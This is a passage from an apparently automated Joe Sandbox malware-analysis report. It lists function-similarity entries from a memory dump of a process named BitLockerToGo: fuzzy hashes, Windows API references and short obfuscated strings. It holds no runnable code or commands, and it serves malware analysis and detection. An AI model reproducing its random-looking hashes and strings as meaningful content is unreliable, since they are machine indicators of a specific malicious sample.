                                                                            • Opcode Fuzzy Hash: 752c91ab4cf9655f81fd553a9420a4af839e72b950d81b9ea4f4854f9136b0fb
                                                                            • Instruction Fuzzy Hash: 23617C72A05B108FC7248F28D87973BBB92BBD0716F5A852DDCC55B251F671AC088781
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 5627420c8c0b042f9a6d9d766bf0d92e7a3e9464c12d1c2708532a4d61de8023
                                                                            • Instruction ID: 3b491890813856a655025a5ed7ad86506a43026aafec4d60f8536f2b6436db7e
                                                                            • Opcode Fuzzy Hash: 5627420c8c0b042f9a6d9d766bf0d92e7a3e9464c12d1c2708532a4d61de8023
                                                                            • Instruction Fuzzy Hash: 7D5126217092019BD3108BA8CC5073BBBE6FBD6711F18CA2EE880A7391C3B49C499792
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2914d14d39b537099086cb69a720f92e15a3b2c27c77ec0a035921e04bf88952
                                                                            • Instruction ID: 50c18c4f4e975e879f84b438cafc1c1171c203efd6ba0f485d9f3edbe86d8eb1
                                                                            • Opcode Fuzzy Hash: 2914d14d39b537099086cb69a720f92e15a3b2c27c77ec0a035921e04bf88952
                                                                            • Instruction Fuzzy Hash: D921B0A15182118BE710DB28C82277BBBF5FF96364F195E18E4C5CB291F7788904C7A6
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 926f35936852d8ba302a598f40432002dbcad272fac95e339c7a7266fd374cf6
                                                                            • Instruction ID: fdb1da5beb85b81733bd625522eb941b26eb2e008214a9d3270e1656bc01b8ca
                                                                            • Opcode Fuzzy Hash: 926f35936852d8ba302a598f40432002dbcad272fac95e339c7a7266fd374cf6
                                                                            • Instruction Fuzzy Hash: D421D274A41204AFDB10CF18CDA1B7EBBB6FB95711F345214E8017B391CBB5AD068BA4
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID: BlanketProxy
                                                                            • String ID:
                                                                            • API String ID: 3890896728-0
                                                                            • Opcode ID: c806161b7f97d131083ccb04c036e34ca8b5772039e82b765d938486c9d59181
                                                                            • Instruction ID: 8e62f933aeff9e4c9315462ce2ebe1ca03470f669a5bc0794d67d4604e36b81d
                                                                            • Opcode Fuzzy Hash: c806161b7f97d131083ccb04c036e34ca8b5772039e82b765d938486c9d59181
                                                                            • Instruction Fuzzy Hash: BCF0B7B41087019FD314DF28D5A871ABBF0FF89304F10880CE4968B3A0DBB5AA48DF82
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID: BlanketProxy
                                                                            • String ID:
                                                                            • API String ID: 3890896728-0
                                                                            • Opcode ID: 76f759d3f1155a3297437a5892021e98177c2f72f93ea462e1ec60302a3a606c
                                                                            • Instruction ID: 897f68e8d1ac277bbc3caaf587d0badb45683b7a4b00077b4c0e0f41570b54ed
                                                                            • Opcode Fuzzy Hash: 76f759d3f1155a3297437a5892021e98177c2f72f93ea462e1ec60302a3a606c
                                                                            • Instruction Fuzzy Hash: B1F067B45083418FD325DF28C5A875ABBE5BB84308F00891CE5958B790D7BA9A4CCF82
                                                                            APIs
                                                                            • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0052D0D5
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeSecurity
                                                                            • String ID:
                                                                            • API String ID: 640775948-0
                                                                            • Opcode ID: 58a1e194c26f846bd6e2584c38aa93f9a369a7a1cf74fa5268a5ea8cee53d9d2
                                                                            • Instruction ID: 6e2f21afff0cdc41f9e881a3dfe41c23ff8ecc98c178ab0b95713e3c16ac281a
                                                                            • Opcode Fuzzy Hash: 58a1e194c26f846bd6e2584c38aa93f9a369a7a1cf74fa5268a5ea8cee53d9d2
                                                                            • Instruction Fuzzy Hash: A9E017367D47006BF7284A18DC13F5022125795B62F398218F311FE7D8C8F8A10A5508
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(?,00000000), ref: 005552E8
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            • Opcode ID: 646a959a3715bd2e8f1eb24634e769d223a5b1e0041762d908c1457cf22cdee3
                                                                            • Instruction ID: 08a19fbf995e178e6b0f562f7b3d3078b712a1e0198246e8ac2f01cde7581e7c
                                                                            • Opcode Fuzzy Hash: 646a959a3715bd2e8f1eb24634e769d223a5b1e0041762d908c1457cf22cdee3
                                                                            • Instruction Fuzzy Hash: CDB09230244200DFEA484B01EC04B20372DBB6A201F201008E509871E2C6B29C4AFA00
                                                                            APIs
                                                                            • CoInitializeEx.COMBASE(00000000,00000002), ref: 0052D0A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID: Initialize
                                                                            • String ID:
                                                                            • API String ID: 2538663250-0
                                                                            • Opcode ID: 180e9aa8ad10ac2ebeca84f7904f1413e64ff0b527f0b51a1a49ce5a45c91c54
                                                                            • Instruction ID: 31c7c4626ff8f87d1fc20a6cff9ea1135efc061b761a9d4ede9e9c7498224987
                                                                            • Opcode Fuzzy Hash: 180e9aa8ad10ac2ebeca84f7904f1413e64ff0b527f0b51a1a49ce5a45c91c54
                                                                            • Instruction Fuzzy Hash: F1D0A735155644B7D204A7ADDC1BFB23A6C8302755F040219F2A2C72D1FD506918E56D
                                                                            APIs
                                                                            • RtlReAllocateHeap.NTDLL(?,00000000), ref: 00558109
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            • Opcode ID: 2841f1108766d9766e62e022ae2b5523a7493c935c4860155b980d75d3650959
                                                                            • Instruction ID: 77db52b35c5b45690c68f44f21d7d8439296d3d781bb60e7991022255420ebfa
                                                                            • Opcode Fuzzy Hash: 2841f1108766d9766e62e022ae2b5523a7493c935c4860155b980d75d3650959
                                                                            • Instruction Fuzzy Hash: 51C09B72641010A7D5541647BC09B757F58D790267F301072FB09940D1D652595FF6A0
                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(?,00000000), ref: 00555396
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID:
                                                                            • API String ID: 3298025750-0
                                                                            • Opcode ID: 39b9435a616127427739fd507baae7c12d32d7199d88bbae2f43057c3082f146
                                                                            • Instruction ID: de55a7433d1454a76a91034adca960470c3dec6797cd5d1d2665e4638c53dc61
                                                                            • Opcode Fuzzy Hash: 39b9435a616127427739fd507baae7c12d32d7199d88bbae2f43057c3082f146
                                                                            • Instruction Fuzzy Hash: 54A022B00A0200ABF0A0232A3C0AFA3330C8B0020AF000000FF08A80C2E022A8E822B8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $&A-C$()$5Q<S$6E+G$7U9W$8]S_$<Y?[$>M"O$E-A/$I)^+$M%E'$O9M;$P!N#$Z@ZV$eI?K$jabc$ntir
                                                                            • API String ID: 0-1601616414
                                                                            • Opcode ID: da3b5171d51605ab5ca9c023518dfe9d9b3c3d684025354ebabfe76276f5c63f
                                                                            • Instruction ID: 34af2a2dcbfcb0afa68f8d0d8e006cbd0e75c480571ade771612a012b9a3e185
                                                                            • Opcode Fuzzy Hash: da3b5171d51605ab5ca9c023518dfe9d9b3c3d684025354ebabfe76276f5c63f
                                                                            • Instruction Fuzzy Hash: 77D1D4726083654BE724CF25A4A126FBFE2EFD2714F1DC96CD4D94B391C73588068B82
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: )84:$ElN~$E~Eq$KM[p$iaQQ$l`kc$u\XZ$x`{l$;
                                                                            • API String ID: 0-639049957
                                                                            • Opcode ID: 1e2bdf1050f80ada65f8fad9c504f63fe708f856b25a02980850cfb77a4f0cec
                                                                            • Instruction ID: cd731c1c1fb35ff016532b913f984fde7b9f7086d23b690f94e09c0207d0fdbb
                                                                            • Opcode Fuzzy Hash: 1e2bdf1050f80ada65f8fad9c504f63fe708f856b25a02980850cfb77a4f0cec
                                                                            • Instruction Fuzzy Hash: 5482E474604B418FC739CF29C490666BFE2BF95310F188A6DE4E68BB92DB75E805CB50
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: #%$2$EGG@$d`Rb$r)B}$z)B}${OuH
                                                                            • API String ID: 0-3036209920
                                                                            • Opcode ID: 31fa2ffa98e869c13ab6ba37216e30c1a016197edbcff0a4ab10a838fcf6e7c9
                                                                            • Instruction ID: 73ca9e5eb33d86f0aa1fe828effcebb4b64f167811b5276868c67acb083cae11
                                                                            • Opcode Fuzzy Hash: 31fa2ffa98e869c13ab6ba37216e30c1a016197edbcff0a4ab10a838fcf6e7c9
                                                                            • Instruction Fuzzy Hash: 6381D17110C3968BD3158F2A94A03ABFFE1AFE3344F28499DE4D55B382D7758909C752
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $%&' $InA>$dejk$U$U
                                                                            • API String ID: 0-283223120
                                                                            • Opcode ID: 71c0e6c87417854c6ad764e0e43c49f6017ba8a3a04a91a18840044ca15b6a5e
                                                                            • Instruction ID: 32f802b01e92d1233efcd476a27a941f2755a4c859647618839a377bc036edca
                                                                            • Opcode Fuzzy Hash: 71c0e6c87417854c6ad764e0e43c49f6017ba8a3a04a91a18840044ca15b6a5e
                                                                            • Instruction Fuzzy Hash: 7212B3716083518FD319CE28C89176FBBE2FBC5314F15CA2DE8A69B391D7758849CB82
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: -e0c$9i7g$a-e+$c)t'$k%h#$}#{
                                                                            • API String ID: 0-851799077
                                                                            • Opcode ID: 46abaadfebe3f66b8e31ed6cb8c850a5c917109b0d11606ad32a139b08e4c181
                                                                            • Instruction ID: 324f2d4c342bfae0f018725ba5f2c68ef04713c4d6fb17794b42fa956850a79f
                                                                            • Opcode Fuzzy Hash: 46abaadfebe3f66b8e31ed6cb8c850a5c917109b0d11606ad32a139b08e4c181
                                                                            • Instruction Fuzzy Hash: 7251DBB0542B419FE360CF22E881B96BBE2BB86740F548E1CC6EA5B704DB74A145CF84
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: %&' $InA>$InA>$f
                                                                            • API String ID: 2994545307-2101634708
                                                                            • Opcode ID: 124f371c44e566fa4a868f6a7b5ce46125010ee4f50b44c53bc7507846ced51b
                                                                            • Instruction ID: b8d3932d0dd2dad9c68f71cd90253ba4264e42df87d82ddb7b707afab0d56d04
                                                                            • Opcode Fuzzy Hash: 124f371c44e566fa4a868f6a7b5ce46125010ee4f50b44c53bc7507846ced51b
                                                                            • Instruction Fuzzy Hash: 0832B3756093818FC714CF68C8A472BBBE2BFD8315F588A2EE89587395D771D809CB42
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HI$r)B}$z)B}$|}bc
                                                                            • API String ID: 0-1054524823
                                                                            • Opcode ID: 7d070a09d2d39ba504d6da603881b6721edc27aaccf0a383d5852eb7ae3c13fd
                                                                            • Instruction ID: 2bb14b7c9b0a6a6c5c3da36ce7193d0769005537219f25ce5e4bb7f897392874
                                                                            • Opcode Fuzzy Hash: 7d070a09d2d39ba504d6da603881b6721edc27aaccf0a383d5852eb7ae3c13fd
                                                                            • Instruction Fuzzy Hash: E9B104729083519BD7209F24C88277BBFE1FF92354F19882CE8C5AB281E735ED458792
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: %&' $%&'
                                                                            • API String ID: 2994545307-1644610688
                                                                            • Opcode ID: af657d3a9c10bf97d008dbc8f3de232af6b1c926729a0020e0578425d83b8e89
                                                                            • Instruction ID: 3a5234fc569dbb91ea9e66fbcb868c1a96d7d093178a491ffe51b144f475a07b
                                                                            • Opcode Fuzzy Hash: af657d3a9c10bf97d008dbc8f3de232af6b1c926729a0020e0578425d83b8e89
                                                                            • Instruction Fuzzy Hash: 29A10571A09301DBD724CB25CCA1B7BBBE2FBC5311F44892EE88587251EB349908CB92
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 07$yK
                                                                            • API String ID: 0-1808118969
                                                                            • Opcode ID: a1463e0b3e37160c021b306d5532d1ff53a4c6a30392c61a5ed4e86bfa9b9d46
                                                                            • Instruction ID: 1426932b570ddce0a7583bf7ae75a973c8430937d821aef3a2ee32985ef8e34b
                                                                            • Opcode Fuzzy Hash: a1463e0b3e37160c021b306d5532d1ff53a4c6a30392c61a5ed4e86bfa9b9d46
                                                                            • Instruction Fuzzy Hash: 419158B2E05619CBD724CFA8C8927AABB72FFE5320F19C128D8555B390E7789D05C790
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: uQRS$Q_
                                                                            • API String ID: 0-1742114800
                                                                            • Opcode ID: 1e681597edd27c4464353dc5238ac65d9a6eaf0914d20f89837cdcc948eadc0e
                                                                            • Instruction ID: 8f8752c58f66f1cf4ecb25f6591653773df6c61063db8e4fe72227324b7fe786
                                                                            • Opcode Fuzzy Hash: 1e681597edd27c4464353dc5238ac65d9a6eaf0914d20f89837cdcc948eadc0e
                                                                            • Instruction Fuzzy Hash: 4281E0716083658FD714CF28D89075FBBE5EBD5704F04892CE5A5AB281DBB0D90A8B82
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: "
                                                                            • API String ID: 0-123907689
                                                                            • Opcode ID: c755d4f713ad3602ffffc0475aab78991e63c86cfe085f248ae130e693da2ce6
                                                                            • Instruction ID: 27b4f488833b3196e2604eb17c8d74cefbdfc1e5a10d60f5afb10d88c6be8c6d
                                                                            • Opcode Fuzzy Hash: c755d4f713ad3602ffffc0475aab78991e63c86cfe085f248ae130e693da2ce6
                                                                            • Instruction Fuzzy Hash: F0D1F472A483116FCB14CE64D4407ABBFE9BFC5318F19892DE8998B282E774DD448BD1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: pq
                                                                            • API String ID: 0-1239689891
                                                                            • Opcode ID: ec56b9422be7362e30d7cd96b843810b9ef2ebd1cc11dfe14005ee9738898575
                                                                            • Instruction ID: 7e954d2446d9ef86b70ec0af552067afb5c8998e9c958be01d9e9c75692ce303
                                                                            • Opcode Fuzzy Hash: ec56b9422be7362e30d7cd96b843810b9ef2ebd1cc11dfe14005ee9738898575
                                                                            • Instruction Fuzzy Hash: A051CCB01183119BC7109F24C8627ABBBF1FF92758F84894CF8C68F251E3798945DB56
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: lc
                                                                            • API String ID: 0-1546258102
                                                                            • Opcode ID: 753d5866a14874b63cab96522448c7db77af71dcd94a1c2dcef96b5c78e9a978
                                                                            • Instruction ID: d3a6043f5dba6a081a82afb2b90f5bf34d46a8165ee5f674820d085d332c8a82
                                                                            • Opcode Fuzzy Hash: 753d5866a14874b63cab96522448c7db77af71dcd94a1c2dcef96b5c78e9a978
                                                                            • Instruction Fuzzy Hash: AD41CEB05083218AC724CF19D8927ABBBF0FF96318F54891CF8964B285E7B8C544CB87
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a45c54420d1b8b32385189829cc1e04a022b92b181644eafbb65e02bcb32c41d
                                                                            • Instruction ID: 874ea55420b87fd6c7004e2683e163d35a8b4e87f987708612215f9ded72728d
                                                                            • Opcode Fuzzy Hash: a45c54420d1b8b32385189829cc1e04a022b92b181644eafbb65e02bcb32c41d
                                                                            • Instruction Fuzzy Hash: 545204316093218BC725DF58E88027EB7E2FFD5308F29892DD996972C5DB34E951CB82
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f0c8a2d0fb54bb4a27aa6a32aebc9abd54265757ddf4c98597ac30ac4acd819b
                                                                            • Instruction ID: cdca0938f4f75b6599824cc995ae0965e3b9ccde074236ed8008d9248db7e080
                                                                            • Opcode Fuzzy Hash: f0c8a2d0fb54bb4a27aa6a32aebc9abd54265757ddf4c98597ac30ac4acd819b
                                                                            • Instruction Fuzzy Hash: 36B15672A043108BE7149E699C6576BBBD9BBC5315F084A2EFD94D3381EA35EC08C792
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b7132a32c8c9acac5b9d82fdf9273d22af1e1829832b3a1bda7b79a400fa7a87
                                                                            • Instruction ID: a090025540ec5ff1a23e25b24b5c98cd1fe4024bc19f1c4169526ec591ec7c58
                                                                            • Opcode Fuzzy Hash: b7132a32c8c9acac5b9d82fdf9273d22af1e1829832b3a1bda7b79a400fa7a87
                                                                            • Instruction Fuzzy Hash: 629107B45497818AE3228B388491BF3BFD1FF67304F18589DE1EB0B252D376291ACB55
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5f996437387cf5025c1b47b733066759de32e7736aed10ed82b7f68f4b2bddbb
                                                                            • Instruction ID: c3f46681a3aa2ec96e170dc8fbfa7cecc8758b3ce913ce151022f5903915072f
                                                                            • Opcode Fuzzy Hash: 5f996437387cf5025c1b47b733066759de32e7736aed10ed82b7f68f4b2bddbb
                                                                            • Instruction Fuzzy Hash: A4A100B5A0C3528FC711CF28C88056EBFE1BF95314F188A7DE8A48B392D7759945CB92
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a7956bb5d0a83121115639482558ee26d38222f24fb779e71161929c0757be9d
                                                                            • Instruction ID: a2c339d10a798939052b1a90d8fda8acc13f7c94f1a5676286e539d96c992beb
                                                                            • Opcode Fuzzy Hash: a7956bb5d0a83121115639482558ee26d38222f24fb779e71161929c0757be9d
                                                                            • Instruction Fuzzy Hash: 1E51CDB26002149BDB209F28CC96B777FA8FF86354F085918F986DB290F774E904C762
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7093a3d056c1b312e1be535059c24b31c38d8c495b8bb67b798fde0df4f18d52
                                                                            • Instruction ID: 6b3b2db23901c1cb220119c48180149be31413f5bda9a98dc90776fb5ff8b3e7
